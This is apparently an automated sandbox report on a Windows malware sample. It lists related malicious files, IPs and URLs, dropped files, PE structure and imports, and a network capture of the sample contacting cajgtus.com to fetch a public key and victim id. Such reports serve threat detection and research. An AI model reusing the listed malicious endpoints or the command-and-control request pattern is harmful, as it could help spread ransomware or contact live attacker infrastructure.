	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	#4711 Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla	Browse	94.130.55.203
	https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3Z	Get hash	malicious	Unknown	Browse	178.63.248.54
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	https://www.sushi-idea.com/	Get hash	malicious	Unknown	Browse	168.119.90.21
CableOndaPA	SgtB2WW8ys.elf	Get hash	malicious	Mirai	Browse	190.219.21.128
	H6ccnU1094.elf	Get hash	malicious	Mirai, Okiru	Browse	190.57.37.210
	ODOCVzwXq5.elf	Get hash	malicious	Mirai	Browse	181.197.167.87
	E8zldNa4ks.elf	Get hash	malicious	Unknown	Browse	190.57.37.237
	rhdbGGdfoq.elf	Get hash	malicious	Mirai	Browse	186.188.158.224
	hYxGptbUmA.elf	Get hash	malicious	Unknown	Browse	200.75.214.0
	7gRw1JCzma.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	190.218.32.182
	4pR4wy3RZI.elf	Get hash	malicious	Mirai, Gafgyt	Browse	190.219.200.239
	he4MyXvFE7.elf	Get hash	malicious	Mirai	Browse	181.197.167.64
	OFP7kz6oLO.elf	Get hash	malicious	Mirai	Browse	200.46.73.48

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
51c64c77e60f3980eea90869b68c58a8	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	SamFw Tool 4.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	8xFzJWrEIa.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, RedLine, SmokeLoader, Vidar	Browse	95.217.9.149
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
37f463bf4616ecd445d4a1937da06e19	JfOWsh7v0r.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24 104.106.57.101
	AaIo4VGgvO.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	104.21.65.24 104.106.57.101
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.24 104.106.57.101
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.24 104.106.57.101
	768.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.65.24 104.106.57.101
	file.exe	Get hash	malicious	Vidar	Browse	104.21.65.24 104.106.57.101
	anuwhqTXGt.dll	Get hash	malicious	Unknown	Browse	104.21.65.24 104.106.57.101
	anuwhqTXGt.dll	Get hash	malicious	Unknown	Browse	104.21.65.24 104.106.57.101
	PO 26519PZ F30 59.vbs	Get hash	malicious	FormBook, GuLoader	Browse	104.21.65.24 104.106.57.101
	Texas_Tool_Purchase_Order#T18834-1.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.65.24 104.106.57.101

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
C:\ProgramData\mozglue.dll	Vk2yYa9dHl.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Glupteba, Mars Stealer, PureLog Stealer, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	MBSetup.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Vidar	Browse
	QEO2mJ8xHx.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	j36lCJ7IcT.exe	Get hash	malicious	Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRAT	Browse
	file.exe	Get hash	malicious	Vidar	Browse

Process:	C:\Users\user\AppData\Local\9d735f84-1d19-402a-bb6c-f54dc28e5a95\build2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Users\user\Desktop\mJVVW85CnW.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.737322779818595
Encrypted:	false
SSDEEP:	3:QbQz39BKQfovn:QMzjhAvn
MD5:	628D2B59499A5C725456ABFB091255B1
SHA1:	587E99EEEA9E9441009D42A42780F655E7BF0499
SHA-256:	AE7F765C77274D05D43E56CA611E2ABF56DE19FD21C3F4CA4A8C79F8772F7AE7
SHA-512:	F9679F1ECB8C0153EEC28F4FA4E9E67F9CF212E138A25CBBE3EBB86DF4E3A46C5151535F7E0254DD0A3DB03F0BEEA2B2B19397FEC7191272679A0B87DB429ECD
Malicious:	false
Preview:	itkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz..

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.578703780584852
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	mJVVW85CnW.exe
File size:	850'944 bytes
MD5:	47ff102b3b17c3d0d18efa09e2cee04e
SHA1:	1119d011dc1e9eb4e07ad2f460f26787a3a29c14
SHA256:	bcbaec2245e008d98b6b8a15dd780aacf1b3afbe3daf68508f48a5e32e283c1c
SHA512:	1338bd8496895d5db358f82412e52b91104f35e0ddc07180935237f0166cec56ff798474f3b18a4af2a3924ec9a8932ad900888ed7957d5ebfcde9481eb2ed8b
SSDEEP:	12288:iTfc6f4R1506FnTHFEdeRcyg4bmUkxb2vr4f6AYZCQFH7E9:ilf4R06llEdeRlTkgD4f65B7Q
TLSH:	B505F10372D1BCA1E367D7328D298AB461EEFCF58E566B5732486E0F18B11A19263F11
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%G..a&.La&.La&.Llt`L\|&.Llt_L.&.Llt^LM&.Lh^,Lf&.La&.L.&.L..ZL`&.LltdL`&.L..aL`&.LRicha&.L................PE..L...^A.d...........

Entrypoint:	0x403f5f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x64C4415E [Fri Jul 28 22:29:50 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3aaa1b88fde88b6f18cce2952dfece3e

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x18cb4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3ca0000	0x1f030	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11200	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x181f0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x11000	0x18c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xfd88	0xfe00	74c20f1264cb950b64daa82257b8fa88	False	0.6034233513779528	data	6.7180298365411675	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x11000	0x85da	0x8600	4526485ba44e77fccc19dfe01ad81a81	False	0.4554862406716418	data	5.135927320977559	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1a000	0x3c85c80	0x98200	e8a5b4d0a63e125b8af2855c1c3c63be	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3ca0000	0x1f030	0x1f200	6ced0508673914a4bd5d11920a64d401	False	0.4450379643574297	data	5.363955619435392	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
AFX_DIALOG_LAYOUT	0x3cb9da0	0xe	data			1.5714285714285714
AFX_DIALOG_LAYOUT	0x3cb9db0	0xe	data			1.5714285714285714
RT_CURSOR	0x3cb9dc0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0x3cbac68	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0x3cbb510	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0x3cbbaa8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0x3cbc950	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0x3cbd1f8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x3ca0a70	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.5652985074626866
RT_ICON	0x3ca1918	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.5478339350180506
RT_ICON	0x3ca21c0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.6184971098265896
RT_ICON	0x3ca2728	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4641078838174274
RT_ICON	0x3ca4cd0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.48639774859287055
RT_ICON	0x3ca5d78	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.49631147540983606
RT_ICON	0x3ca6700	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.44769503546099293
RT_ICON	0x3ca6bd0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.42217484008528783
RT_ICON	0x3ca7a78	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.47247292418772563
RT_ICON	0x3ca8320	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Romanian	Romania	0.5697004608294931
RT_ICON	0x3ca89e8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.4703757225433526
RT_ICON	0x3ca8f50	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.4679460580912863
RT_ICON	0x3cab4f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.48334896810506567
RT_ICON	0x3cac5a0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.5032786885245901
RT_ICON	0x3cacf28	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.5576241134751773
RT_ICON	0x3cad408	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Romanian	Romania	0.4933368869936034
RT_ICON	0x3cae2b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Romanian	Romania	0.4693140794223827
RT_ICON	0x3caeb58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Romanian	Romania	0.4291907514450867
RT_ICON	0x3caf0c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Romanian	Romania	0.2804979253112033
RT_ICON	0x3cb1668	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Romanian	Romania	0.2854127579737336
RT_ICON	0x3cb2710	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Romanian	Romania	0.3028688524590164
RT_ICON	0x3cb3098	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Romanian	Romania	0.33599290780141844
RT_ICON	0x3cb3568	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Romanian	Romania	0.392590618336887
RT_ICON	0x3cb4410	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Romanian	Romania	0.5803249097472925
RT_ICON	0x3cb4cb8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Romanian	Romania	0.613479262672811
RT_ICON	0x3cb5380	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Romanian	Romania	0.5606936416184971
RT_ICON	0x3cb58e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Romanian	Romania	0.537655601659751
RT_ICON	0x3cb7e90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Romanian	Romania	0.5959193245778611
RT_ICON	0x3cb8f38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Romanian	Romania	0.5811475409836065
RT_ICON	0x3cb98c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Romanian	Romania	0.648936170212766
RT_STRING	0x3cbd978	0x2f2	data	Romanian	Romania	0.47877984084880637
RT_STRING	0x3cbdc70	0x2aa	data	Romanian	Romania	0.4941348973607038
RT_STRING	0x3cbdf20	0x4a8	data	Romanian	Romania	0.4538590604026846
RT_STRING	0x3cbe3c8	0x1b0	data	Romanian	Romania	0.5092592592592593
RT_STRING	0x3cbe578	0x2d2	data	Romanian	Romania	0.4903047091412742
RT_STRING	0x3cbe850	0x7da	data	Romanian	Romania	0.41492537313432837
RT_GROUP_CURSOR	0x3cbba78	0x30	data			0.9375
RT_GROUP_CURSOR	0x3cbd760	0x30	data			0.9375
RT_GROUP_ICON	0x3ca6b68	0x68	data	Romanian	Romania	0.6923076923076923
RT_GROUP_ICON	0x3cad390	0x76	data	Romanian	Romania	0.6779661016949152
RT_GROUP_ICON	0x3cb9d28	0x76	data	Romanian	Romania	0.6779661016949152
RT_GROUP_ICON	0x3cb3500	0x68	data	Romanian	Romania	0.7115384615384616
RT_VERSION	0x3cbd790	0x1e4	data			0.5371900826446281

DLL	Import
KERNEL32.dll	GetComputerNameW, CreateHardLinkA, GetTickCount, GetConsoleAliasesA, GetCompressedFileSizeW, EnumTimeFormatsA, GetUserDefaultLangID, FindResourceExA, GetLocaleInfoW, MultiByteToWideChar, GetTempPathW, InterlockedExchange, GetLastError, ChangeTimerQueueTimer, SetLastError, GetThreadLocale, GetProcAddress, LocalCompact, BuildCommDCBW, LoadLibraryA, WriteConsoleA, LocalAlloc, GetExitCodeThread, AddAtomW, RemoveDirectoryW, SetNamedPipeHandleState, GlobalFindAtomW, GetModuleFileNameA, GetOEMCP, GlobalUnWire, FindFirstChangeNotificationA, LoadLibraryExA, SetCalendarInfoA, ReadConsoleInputW, GetWindowsDirectoryW, GetConsoleProcessList, GetVolumeInformationW, SetFileAttributesA, GetSystemDefaultLangID, WriteConsoleW, GetStringTypeW, EncodePointer, DecodePointer, IsProcessorFeaturePresent, GetCommandLineA, RaiseException, RtlUnwind, IsDebuggerPresent, HeapFree, HeapAlloc, ExitProcess, GetModuleHandleExW, WideCharToMultiByte, HeapSize, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, GetFileType, DeleteCriticalSection, GetStartupInfoW, CloseHandle, GetCurrentThreadId, GetProcessHeap, WriteFile, GetModuleFileNameW, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetEnvironmentStringsW, FreeEnvironmentStringsW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, InitializeCriticalSectionAndSpinCount, Sleep, GetCurrentProcess, TerminateProcess, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, LoadLibraryExW, IsValidCodePage, GetACP, GetCPInfo, HeapReAlloc, LCMapStringW, GetConsoleCP, GetConsoleMode, SetFilePointerEx, SetStdHandle, FlushFileBuffers, OutputDebugStringW, CreateFileW
ADVAPI32.dll	DeregisterEventSource
WINHTTP.dll	WinHttpOpen

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 24, 2024 01:44:19.656116009 CEST	51961	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:19.860691071 CEST	53	51961	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:23.311429977 CEST	65150	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:23.311753035 CEST	64435	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:24.305238962 CEST	64435	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:24.305270910 CEST	65150	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:25.320609093 CEST	65150	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:25.320645094 CEST	64435	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:26.165220976 CEST	53	64435	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:26.165266037 CEST	53	64435	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:26.165297985 CEST	53	64435	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:26.532890081 CEST	53	65150	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:26.532905102 CEST	53	65150	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:26.532969952 CEST	53	65150	1.1.1.1	192.168.2.4
Apr 24, 2024 01:44:30.843111992 CEST	60680	53	192.168.2.4	1.1.1.1
Apr 24, 2024 01:44:30.996848106 CEST	53	60680	1.1.1.1	192.168.2.4

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 01:44:26.468524933 CEST	139	OUT	GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 01:44:27.348898888 CEST	765	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:46 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 561 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 74 72 6f 79 56 69 46 43 6a 30 45 73 52 30 70 41 75 56 65 63 5c 5c 6e 53 77 67 78 4c 6e 7a 33 49 65 68 57 5c 2f 6f 30 79 47 53 6e 4d 50 61 67 38 4e 72 62 36 78 67 66 56 50 63 63 32 64 71 51 57 4a 75 4f 37 77 6f 45 69 48 47 67 68 4b 37 5a 31 46 32 53 4f 78 7a 5c 2f 70 5c 5c 6e 49 75 35 70 61 31 54 7a 32 5c 2f 35 57 6e 68 64 4a 72 49 70 38 76 61 6e 47 4c 51 55 58 31 72 6d 63 6b 68 4e 68 55 39 55 65 58 67 41 75 68 71 54 49 37 76 38 36 36 77 6f 6d 6c 5c 2f 71 30 36 64 48 78 5c 5c 6e 7a 39 30 69 68 74 69 32 35 2b 2b 77 44 58 5a 71 4b 55 6d 39 56 74 4d 66 2b 63 31 72 76 75 66 41 4c 43 54 64 65 69 49 41 49 70 45 42 4c 5a 64 4d 41 4b 4b 42 64 43 43 67 54 67 74 31 44 42 68 4b 5c 5c 6e 55 37 4f 6a 45 54 46 59 4a 54 47 31 42 37 77 37 78 78 6c 66 30 7a 37 72 34 2b 66 67 62 36 38 64 70 33 76 6f 35 57 48 76 63 66 6f 42 77 5c 2f 54 4c 42 6a 44 37 54 38 78 54 5a 5c 2f 43 6e 39 6a 30 62 5c 5c 6e 5c 2f 56 77 48 47 62 64 4a 55 4f 44 50 72 4f 6e 51 31 72 73 34 67 4f 4f 70 7a 39 58 50 75 4d 55 6e 71 45 6f 6d 4a 63 51 70 49 37 34 41 6b 33 2b 6c 67 70 70 30 34 42 79 6f 77 49 55 62 46 43 56 35 5c 5c 6e 41 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 69 74 6b 6d 37 4d 4f 73 4f 6c 56 51 6b 62 45 51 68 57 43 56 45 57 6f 4d 79 47 46 68 56 6a 67 45 64 70 4e 6c 67 66 69 7a 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtroyViFCj0EsR0pAuVec\\nSwgxLnz3IehW\/o0yGSnMPag8Nrb6xgfVPcc2dqQWJuO7woEiHGghK7Z1F2SOxz\/p\\nIu5pa1Tz2\/5WnhdJrIp8vanGLQUX1rmckhNhU9UeXgAuhqTI7v866woml\/q06dHx\\nz90ihti25++wDXZqKUm9VtMf+c1rvufALCTdeiIAIpEBLZdMAKKBdCCgTgt1DBhK\\nU7OjETFYJTG1B7w7xxlf0z7r4+fgb68dp3vo5WHvcfoBw\/TLBjD7T8xTZ\/Cn9j0b\\n\/VwHGbdJUODPrOnQ1rs4gOOpz9XPuMUnqEomJcQpI74Ak3+lgpp04ByowIUbFCV5\\nAwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"itkm7MOsOlVQkbEQhWCVEWoMyGFhVjgEdpNlgfiz"}

Timestamp	Bytes transferred	Direction	Data
Apr 24, 2024 01:44:26.469774008 CEST	128	OUT	GET /test2/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: cajgtus.com
Apr 24, 2024 01:44:27.357055902 CEST	765	IN	HTTP/1.1 200 OK Date: Tue, 23 Apr 2024 23:44:46 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 561 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 74 72 6f 79 56 69 46 43 6a 30 45 73 52 30 70 41 75 56 65 63 5c 5c 6e 53 77 67 78 4c 6e 7a 33 49 65 68 57 5c 2f 6f 30 79 47 53 6e 4d 50 61 67 38 4e 72 62 36 78 67 66 56 50 63 63 32 64 71 51 57 4a 75 4f 37 77 6f 45 69 48 47 67 68 4b 37 5a 31 46 32 53 4f 78 7a 5c 2f 70 5c 5c 6e 49 75 35 70 61 31 54 7a 32 5c 2f 35 57 6e 68 64 4a 72 49 70 38 76 61 6e 47 4c 51 55 58 31 72 6d 63 6b 68 4e 68 55 39 55 65 58 67 41 75 68 71 54 49 37 76 38 36 36 77 6f 6d 6c 5c 2f 71 30 36 64 48 78 5c 5c 6e 7a 39 30 69 68 74 69 32 35 2b 2b 77 44 58 5a 71 4b 55 6d 39 56 74 4d 66 2b 63 31 72 76 75 66 41 4c 43 54 64 65 69 49 41 49 70 45 42 4c 5a 64 4d 41 4b 4b 42 64 43 43 67 54 67 74 31 44 42 68 4b 5c 5c 6e 55 37 4f 6a 45 54 46 59 4a 54 47 31 42 37 77 37 78 78 6c 66 30 7a 37 72 34 2b 66 67 62 36 38 64 70 33 76 6f 35 57 48 76 63 66 6f 42 77 5c 2f 54 4c 42 6a 44 37 54 38 78 54 5a 5c 2f 43 6e 39 6a 30 62 5c 5c 6e 5c 2f 56 77 48 47 62 64 4a 55 4f 44 50 72 4f 6e 51 31 72 73 34 67 4f 4f 70 7a 39 58 50 75 4d 55 6e 71 45 6f 6d 4a 63 51 70 49 37 34 41 6b 33 2b 6c 67 70 70 30 34 42 79 6f 77 49 55 62 46 43 56 35 5c 5c 6e 41 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 69 74 6b 6d 37 4d 4f 73 4f 6c 56 51 6b 62 45 51 68 57 43 56 45 57 6f 4d 79 47 46 68 56 6a 67 45 64 70 4e 6c 67 66 69 7a 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC 